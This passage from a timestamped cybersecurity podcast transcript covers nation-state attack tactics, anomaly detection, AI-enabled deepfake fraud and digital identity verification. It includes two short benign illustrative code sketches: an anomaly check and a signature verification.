and, like you know, blatantly take over your screen and move
00:35:45
your mouse around.
00:35:46
Right, like they did in 2014, where the US isn't known for
00:35:50
doing that as much.
00:35:52
They're more from the passive, gather the intelligence and then
00:35:56
use it at a later time.
00:35:57
Are you able to see those sorts of attributes as well to these
00:36:03
attacks?
00:36:06
Speaker 2: Yeah, yeah, I think the reality is a nation state,
00:36:16
or really any threat actor, is only going to work as hard as
00:36:19
they need to.
00:36:20
So they're going to start with more highly automated attacks
00:36:24
and tools, things that are taking advantage of commonly
00:36:29
known, you know, weaknesses and vulnerabilities.
00:36:31
If that doesn't, you know, work , then they're going to start to
00:36:35
go more specific and maybe start launching some more
00:36:38
targeted phishing or, you know, spear-phishing type campaigns to
00:36:40
see if they can get a user to make a mistake, and if
00:36:47
that doesn't work, then they might begin to deploy more.
00:36:50
You know, novel tactics, right?
00:36:53
And this is where nation-states, you know, have more
00:36:56
wherewithal, because, you know, nation-states are in the
00:36:59
practice of harvesting zero-days. They've got teams of very smart
00:37:05
researchers who will scour through open-source code repositories or
00:37:12
take closed source systems and try to find weaknesses in those
00:37:18
systems that can be exploited at a later point in time as a zero
00:37:24
day.
00:37:24
They hold onto those dearly.
00:37:26
They don't want to let those go in the wild unless they
00:37:30
absolutely have to.
00:37:31
They'd only be employed against the highest-value targets.
00:37:34
Once they're used, eventually it'll be discovered, then you
00:37:39
can build a rule or signature going forward.
00:37:43
That is where the detection analytics becomes much more
00:37:49
sophisticated and complex and really is where things like
00:37:56
anomaly detection come into play .
00:37:58
When we think about how we look for signs of a threat actor in
00:38:04
an environment, there are the things that we know to go look for because we
00:38:09
observed them in the past.
00:38:10
These things are all now chronicled in great repositories
00:38:15
like the MITRE ATT&CK framework, which is a fantastic resource,
00:38:21
but there are these more novel attacks.
00:38:24
There's also now living off the land, which is also the
00:38:27
emergent technique of a nation-state or advanced threat
00:38:31
actor.
00:38:31
They're not going to use tooling or techniques that would
00:38:36
be detected by CrowdStrike or other detection technology.
00:38:39
They're using PowerShell, which might already exist on the
00:38:41
system, and using that under credentials that they've
00:38:46
compromised through other means, and so you know those things
00:38:49
become harder to detect because they're using tools in the
00:38:52
environment, using accounts that they've got access to and
00:38:56
they're blending in.
00:38:58
And that is where anomaly detection then plays a role,
00:39:02
where really the only way you can suss that out is by
00:39:05
identifying shifts in behavior, shifts in behavior for an
00:39:09
account or a collection of accounts tied to a user, or
00:39:13
shifts in behavior of a process on a system or a system in
00:39:19
general and how it interacts with other systems.
00:39:24
And that is hard to do well without having a false alarm
00:39:28
factory, but that is where you get, on the very advanced side of
00:39:33
detection.
00:39:34
Anomaly detection needs to play a critical role and the
00:39:39
challenge with anomaly detection is that you need a lot of
00:39:42
people traditionally to do that well, because you're going to
00:39:45
fire off a lot of alarms that somebody needs to go investigate
00:39:48
because the false positives from anomaly detection, currently and
00:39:53
historically, have been very high.
00:39:54
It's hard to differentiate between an anomaly of an account
00:39:59
, which is a user just shifting their normal behavior, and an
00:40:02
account that is actually under the control of a threat actor.
00:40:06
Those two things are hard to differentiate in data analytics
00:40:12
and that is for us a big area of innovation as far as going
00:40:17
forward, is the anomaly detection layer, as we continue our roadmap
00:40:21
on the path towards nation-state threat resiliency.
00:40:29
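As a rough illustration of the behavioral-shift idea he describes, here is a toy sketch only, not the analytics RADICL actually runs. A per-account baseline can be as simple as comparing today's activity against that account's own history and flagging large deviations; the false-positive problem Chris mentions is exactly what happens when a legitimate change in user behavior trips the same check. The metric and numbers below are made up.

```python
from statistics import mean, stdev

def is_anomalous(history: list[int], today: int, threshold: float = 3.0) -> bool:
    """Flag 'today' if it sits more than `threshold` standard deviations
    above this account's own historical baseline."""
    if len(history) < 7:              # not enough history to baseline yet
        return False
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:                    # perfectly flat history: any change stands out
        return today != mu
    return (today - mu) / sigma > threshold

# Made-up example: number of distinct hosts one account touched per day.
baseline = [2, 3, 2, 2, 4, 3, 2, 3, 2, 3]
print(is_anomalous(baseline, 3))      # False -- within normal range
print(is_anomalous(baseline, 25))     # True  -- lateral-movement-like spike
```

Production systems model many such features per account, host, and process, which is where the machine learning and AI he references come in.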
Speaker 1: Yeah, that is.
00:40:29
It's a really challenging area, right?
00:40:33
We're kind of moving into this place where we're getting so
00:40:36
advanced, you know, the defenses are becoming so advanced that
00:40:40
the attackers are coming out with, um, you know, like things
00:40:47
that you would just never think of as attack vectors and as
00:40:51
methods of compromise, right, and it's always interesting for
00:40:55
me to kind of see where this is going.
00:40:57
You know, and you know for you as an expert in the field, where
00:41:01
do you see this evolving to, right?
00:41:08
Where do you see, potentially, the threat actors evolving to, to
00:41:10
counteract an anomaly detection system?
00:41:12
And then what are the protections that could even come
00:41:17
into play in the future of, you know, addressing those risks?
00:41:22
Speaker 2: Yeah, I mean.
00:41:23
Sorry, it's hard to know for sure where it's going to go, but
00:41:25
yeah, AI is certainly going to, you know, play an increasingly important
00:41:28
role in it.
00:41:29
From, you know, just the ability to better synthesize social engineering-
00:41:35
type attacks, whether that's through, you know, through email
00:41:39
or text or voice, right? I mean, you can spin up a phone
00:41:42
call so that it sounds like your mom or your dad, um, asking
00:41:46
for information, for help, because voices can now
00:41:49
be cloned, or an image or a video of someone that they love, you
00:41:52
know, supposedly in harm's way, and it's hard to suss that out as fraud.
00:41:56
So you know, we're going to see, you know, that
00:41:59
class of attack on the social and human, you know side of
00:42:03
things.
00:42:03
Uh, and then AI is also going to be
00:42:08
used to accelerate the pace of finding weaknesses in software
00:42:11
vulnerabilities and also to exploit them from an automation
00:42:14
perspective, and so there's just going to be an accelerant and
00:42:18
an enablement factor across all attack vectors, and the same
00:42:23
then needs to be seen on the defensive side as well.
00:42:27
I think the challenge is that the offensive side outpaces the
00:42:32
defensive side, and so there'll be some catching up to do on the
00:42:38
defensive side.
00:42:39
That's why I've personally always been a huge believer in
00:42:43
really just threat detection and incident response, because I
00:42:47
just think, you know, you can never prevent everything.
00:42:49
The threat actor will always have motivation.
00:42:52
They will typically be ahead of the defensive mechanisms that
00:42:56
can be put in place from a prevention perspective and you
00:42:59
just have to be able to detect, you know, these indicators of
00:43:03
compromise and respond, because, you know, a motivated
00:43:07
threat will get through.
00:43:09
And so for us on the defensive side, I think it's really going
00:43:13
to be looking at how can the advancements in AI and machine
00:43:17
learning help us better synthesize the data that we now
00:43:21
have access to. There's so much information now that we can
00:43:25
acquire about IT infrastructures and environments. How do we better
00:43:30
synthesize that to understand when we see meaningful shifts in
00:43:33
that environment and to pull them out with increasing
00:43:36
accuracy.
00:43:37
AI should play a profound role in the evolution of anomaly
00:43:40
detection and the accuracy of anomaly detection.
00:43:42
00:43:44
It also should play a profound role in helping to guide and
00:43:49
augment human security operators, be that a security co-pilot type
00:43:54
ability that helps them to make better, more informed decisions
00:43:59
or even predict and suggest the course of action to take in a
00:44:03
given scenario or condition and eventually do it for them.
00:44:08
That's the ultimate place we need to get to is that AI is
00:44:14
actually making the end-to-end determination of that's a novel
00:44:18
attack.
00:44:19
That system's compromised, that account's compromised along
00:44:23
with the 10 others, and the AI is empowered and able to disable
00:44:26
those accounts and that system without any human being
00:44:30
involved.
00:44:31
You know, that is the place we need to get to from a defensive
00:44:34
perspective.
00:44:35
That's going to take years of innovation to get there, because
00:44:38
it needs to be completely trustworthy.
00:44:41
You can't have an autonomous agent, an entity in your
00:44:46
environment that is beginning to change the IT infrastructure on
00:44:51
the fly based on what it's observing, if you do not
00:44:54
absolutely trust it, because ultimately, a business will rule it out
00:44:58
as a risk.
00:44:58
You have to run your business. And so, you know, that's the goal
00:45:05
for us at RADICL.
00:45:05
We see ourselves as an AI platform.
00:45:06
Ultimately, how do we evolve the platform to the point where
00:45:12
that AI becomes more independent, you know, sentient is
00:45:18
not the right word but you know, more independently, empowered
00:45:23
to take actions without a human operator being in the loop, with
00:45:27
increased frequency?
00:45:31
Speaker 1: It seems like it's going the AI route on both ends,
00:45:34
where attackers are going to be using AI to mimic someone's
00:45:38
voice that you trust and know, to mimic you to gain access to
00:45:42
your accounts and things like that.
00:45:44
On the other hand, we have to evolve as well and develop AI to
00:45:51
, you know, identify those other rogue AIs.
00:45:55
Right, it's interesting, you know.
00:46:00
It's an interesting time because we're like right at the
00:46:02
very beginning where we're starting to see like computers
00:46:05
versus computers in a very real, tangible way.
00:46:11
Speaker 2: Yeah, it's, yeah, it's a real problem.
00:46:14
I mean, look,
00:46:17
you know, politics aside, I think there's
00:46:19
a very strong argument now for
00:46:22
some kind of a national digital ID system, almost like a national
00:46:27
public key infrastructure, where people's, you know,
00:46:30
digital identity can be verified .
00:46:33
You know, and we need to get ahead of this in some way so
00:46:37
that when I send something, or my image is included, you know, in
00:46:41
part of a picture or part of a video where my voice is
00:46:43
recorded, that can be cryptographically signed in some
00:46:48
way and be verified as actually being me. And to me,
00:46:55
like, you know, I'm not current on my cryptographic knowledge, but
00:46:59
you know, PKI and X.509, which were around back when I was in cryptography,
00:47:03
could have a role to play here.
00:47:06
But one way or another, I think if we can't get on top of being
00:47:11
able to actually verify that the person or entity in an
00:47:17
image or on voice or in communication is actually who
00:47:21
they are, it's going to be a bit of a wild and scary ride.
00:47:25
And on the security side, it's going to be hard to address.
00:47:34
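The core primitive Chris is gesturing at here is an ordinary digital signature: content signed with a private key can be verified by anyone holding the matching public key, and any tampering, or a deepfake that was never signed, fails verification. Below is a minimal sketch using the Python `cryptography` package and Ed25519; a real national-ID scheme would also need certificates binding keys to people, revocation, and privacy protections, none of which are shown here, and the message bytes are placeholders.

```python
# pip install cryptography
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# The sender holds a private key; a PKI / digital-ID system would vouch that
# the matching public key really belongs to that person.
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

message = b"audio clip / video frame / email body bytes go here"
signature = private_key.sign(message)          # attached alongside the content

# Verifier side: passes silently if authentic, raises if forged or altered.
try:
    public_key.verify(signature, message)
    print("Verified: signed by the claimed identity")
except InvalidSignature:
    print("Rejected: not signed by the claimed identity")

# Any edit to the content -- or an unsigned deepfake -- breaks verification.
try:
    public_key.verify(signature, b"tampered or synthesized content")
except InvalidSignature:
    print("Tampered/synthetic copy rejected")
```

The hard part, as the conversation goes on to note, is less the cryptography than the identity binding and privacy trade-offs around who issues and holds those keys.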
Speaker 1: Yeah, that's an interesting problem.
00:47:37
Slash solution, right.
00:47:39
I've thought about that digital identity verification before
00:47:45
and just as a security professional, right,
00:47:48
it makes me nervous, because then I start thinking of, okay,
00:47:52
well, how can that be used against me?
00:47:54
How can it be potentially stolen and, you know,
00:47:58
used to impersonate me?
00:47:58
Right, because that will.
00:47:59
That will shift the focus of, you know, nation-states, which have
00:48:04
unlimited resources, and if they just say, hey, we're going to
00:48:07
break into this database, no matter what, you know, we're
00:48:10
going to find it, we're going to get all the information from it
00:48:12
, it's really almost more of a, you know, matter of time
00:48:17
until they do it, rather than they'll never do it.
00:48:20
Right, but at the same time, we need something like that to
00:48:25
kind of get ahead to provide the privacy and the identity
00:48:30
verification of people on social media, of people over email and
00:48:35
things like that.
00:48:36
So it's an interesting problem.
00:48:38
I almost feel like there's no right answer right now, at least
00:48:43
I don't know, maybe for myself, right, maybe I'm
00:48:46
too much on the negative side, I guess.
00:48:50
Speaker 2: It's a tough one. My views have changed.
00:48:51
I mean, 20 years ago?
00:48:52
No way would I have wanted that, because of that kind of
00:48:56
insider-information concern.
00:48:57
But I think for me, um, yeah, I would fashion myself
00:49:01
a pragmatist, you know, in most things, and the reality is
00:49:04
now there is no more privacy, um, yeah, and so we've
00:49:09
already lost privacy.
00:49:10
Privacy's gone right.
00:49:12
I mean, it's just that, you know.
00:49:14
You know, it's just, our information is in the hands of
00:49:19
various companies Google, Apple, Microsoft, um, they know a
00:49:25
ton about us.
00:49:25
And then there's the dark web and what's out there about us,
00:49:30
and so, you know, the notion of privacy, I don't think it's
00:49:35
real anymore anyway, and we would also have the protections and
00:49:38
benefits that would come along with something like a, some kind
00:49:42
of digital ID or at least ID verification system, and there
00:49:46
are ways to do this cryptographically, which is
00:49:49
still obfuscate the person, you know, and have some privacy
00:49:52
mechanism built into it.
00:49:54
That's not my area of specialty, but I believe there is
00:49:57
a solution, you know, to at least address the deep
00:50:02
fake fraud that is coming and the voice fraud that is coming
00:50:08
and all the things that are coming where people's images and
00:50:12
voices and likenesses can be used for malicious purposes.
00:50:16
It is a very, very challenging problem, technologically and
00:50:22
socially.
00:50:22
It's probably one we're not going to see a solution to
00:50:28
anytime soon.
00:50:30
Speaker 1: Yeah, definitely Chris.
00:50:32
Unfortunately we're at the top of our time here.
00:50:35
The 50 minutes or so really flew by.
00:50:39
It was a very interesting conversation.
00:50:41
I really appreciate you coming on.
00:50:43
I really enjoyed it.
00:50:45
Speaker 2: Yeah, I think it was nice to cover a lot of fun
00:50:49
areas, so thanks for having me on as a guest.
00:50:53
Speaker 1: Yeah, absolutely. So, Chris,
00:50:54
Before I let you go, how about you tell my audience where they
00:50:57
can find you if they wanted to reach out, and where they can
00:51:00
find your company?
00:51:01
Speaker 2: Yeah, I mean, I think really the best way is to go to
00:51:04
our website, radicl.com.
00:51:06
That's radical without the A: R-A-D-I-C-L.
00:51:15
Speaker 1: Awesome. Well, thanks, Chris.
00:51:16
I really appreciate it and I hope everyone listening enjoyed
00:51:19
this episode.
00:51:20
Bye everyone.